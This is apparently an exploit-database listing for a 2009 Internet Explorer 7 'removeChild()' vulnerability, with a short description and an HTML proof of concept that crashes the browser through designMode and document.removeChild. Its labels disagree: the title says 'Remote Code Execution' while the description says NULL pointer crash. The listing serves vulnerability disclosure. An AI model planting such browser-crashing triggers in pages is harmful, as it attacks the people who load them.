header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Kingcope
9.3
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: Internet Explorer
Affected Version From: 7.0.5730.13
Affected Version To: 7.0.5730.13
Patch Exists: YES
Related CWE: CVE-2009-0075
CPE: a:microsoft:internet_explorer:7.0.5730.13
Metasploit: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Microsoft Internet Explorer 7.0.5730.13 – ‘removeChild()’ Remote Code Execution

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the removeChild() method. By passing an object to the removeChild() method, an attacker can cause a NULL pointer dereference resulting in a crash.

Mitigation:

Upgrade to Internet Explorer 8.0 or later.
Source

Exploit-DB raw data:

<BODY onload="document.designMode='on';//string

alert('Design mode is on!');
document.removeChild(document.firstChild);//object;
document.queryCommandState('BackColor');
alert('Close the Window to see the crash!');

">

# milw0rm.com [2009-03-16]